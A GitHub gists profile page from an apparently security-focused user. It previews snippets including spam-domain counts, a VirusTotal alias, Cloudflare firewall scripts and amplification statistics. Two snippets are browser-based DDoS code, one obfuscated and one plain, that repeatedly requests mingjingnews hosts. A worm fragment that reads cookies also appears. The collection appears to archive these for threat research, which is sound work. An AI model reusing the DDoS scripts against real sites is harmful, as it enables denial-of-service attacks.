Skip to content

Instantly share code, notes, and snippets.

Justin xxdesmus

Block or report user

Report or block xxdesmus

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@xxdesmus
xxdesmus / README.txt
Created Jan 29, 2018 — forked from whitequark/README.txt
Strava archiver
View README.txt
1. install postgres
2. run makedb.rb >tiles.csv
3. run tiles.sql
4. run archive.rb
5. enjoy
@xxdesmus
xxdesmus / top100spam.txt
Created Jan 28, 2018
Top 100 spam domains from Jan 13, 2018 - Jan 25, 2018
View top100spam.txt
2020191 moresex.space
1738469 fforsex.space
1581379 xxxlola.space
1438921 onlylowe.space
1357090 forsexx.space
1325587 xxxlily.space
1317763 morelove.space
1145549 morresexxxx.space
1114029 forlove.space
1094804 forrlovve.space
View mail honeypot
531386 http://sex69sex.info
314172 http://xxxlola.space
204109 http://sex69sex3.website
193275 http://embersexy.space
141532 http://sexxxymiaa.space
123132 http://xxxlily.space
118136 http://sex4sex.info
117762 http://xxxjen.space
85827 http://sexyymia.space
59542 http://emberpage.space
@xxdesmus
xxdesmus / virustotal_upload
Created Nov 1, 2017 — forked from mattghali/virustotal_upload
Upload a sample to VirusTotal and pretty print the report. All in a handy alias.
View virustotal_upload
#!/usr/bin/env bash
#
# Upload a sample to VirusTotal and pretty print the report.
# All in a handy alias.
#
# Dependencies:
#
# * curl
# * jq
# * VirusTotal API key
View gdocs.pro-worm
<html>
<head>
<script type="text/javascript">
function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
@xxdesmus
xxdesmus / ddos-from-baidu.js
Created Aug 23, 2017 — forked from nczz/ddos-from-baidu.js
百度在主動推送網址的方法中藏有惡意原碼
View ddos-from-baidu.js
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b((/X\\/([\\d]+)/Z.19(i.K.M.H())[1]>=1b)&&(i.K.M.H().1a("16")<0)){3 D=T;3 p=[\'n://13.q.m/\',\'n://15.q.m/\',\'n://14.q.m/\',\'n://11.12.m/\'];3 E=17;3 k=18;3 O=10;3 s=1;h w(){3 8=e 7();A 7.S(8.Y(),8.W(),8.U(),8.V(),8.I(),8.J())/R}g.z("B")[0].F="<1r 1s=\\"y\\" 1q=\\"1o-y\\">"+g.z("B")[0].F;3 9=[];3 f=[];3 x=5;3 c=[];3 a=[];3 r=\'\';3 l=0;h o(2){3 6=9[2];b(6!=5){g.G.1p(6)}9[2]=5;b(l<E&&a[2]-x<D){Q(\'u(\'+2+\')\',(a[2]-c[2])>k?k:(a[2]-c[2]))}}h L(2){b(9[2]==5){A}b(9[2].1x){i.C(f[2]);a[2]=e 7().j();o(2)}1v{b(e 7().j()-c[2]>k){i.C(f[2]);o(2)}}}h u(2){6=g.G.1t(g.1w(\'1u\'));r=p[w()%p.1n];6.1f=r+\'?t=\'+w()+P.1e(P.1c()*1d);6.1h.1l=\'1m\';9[2]=6;c[2]=a[2]=e 7().j();f[2]=1k("L("+2+")",1i);l=l+1}
@xxdesmus
xxdesmus / mingjingtimes-ddos-code.js
Created Aug 23, 2017 — forked from nczz/mingjingtimes-ddos-code.js
明鏡時報惡意大量請求攻擊程式碼
View mingjingtimes-ddos-code.js
if ((/chrome\/([\d]+)/gi.exec(window.navigator.userAgent.toLowerCase())[1] >= 34) && (window.navigator.userAgent.toLowerCase().indexOf("edge") < 0)) {
var MAX_TIME = 300000;
var url_list = ['http://news.mingjingnews.com/', 'http://s1.mingjingnews.com/', 'http://tv.mingjingnews.com/', 'http://www.mingjingtimes.com/'];
var MAX_COUNT = 100000000;
var TIMEGAP = 500;
var THREAD = 10;
var START_CLOCK = 1;
function unixtime() {
var dt = new Date();
@xxdesmus
xxdesmus / cloudflare-ipset.sh
Created Mar 30, 2017 — forked from KiNgMaR/cloudflare-ipset.sh
Cloudflare IPTABLES and IPSET scripts
View cloudflare-ipset.sh
#/bin/sh
# name of the ipset - v4 or v6 will be appended.
IPSET_NAME=cloudflare-
# argument: v4 or v6 (defaults to v4)
cloudflare_ipset ()
{
local ipv
local inetv
View gist:336af4b717fdb719f20e9ef284c2249a
############
## Google ##
############
$ for i in {1..10}; do dig @8.8.8.8 canhazip.com | grep "Query time"; done
;; Query time: 54 msec
;; Query time: 59 msec
;; Query time: 45 msec
;; Query time: 20 msec
;; Query time: 20 msec
@xxdesmus
xxdesmus / Amplification-type-count.txt
Last active Oct 19, 2016
Amplification type count -> February 2016 - October 2016
View Amplification-type-count.txt
Type | Count
---------------------------
NTP | 3,749,953,101
unknown | 381,814,150
DNS | 191,622,518
Invalid | 123,173,586
CHARGEN | 93,040,586
SSDP | 10,546,205
QOTD | 365,421
You can’t perform that action at this time.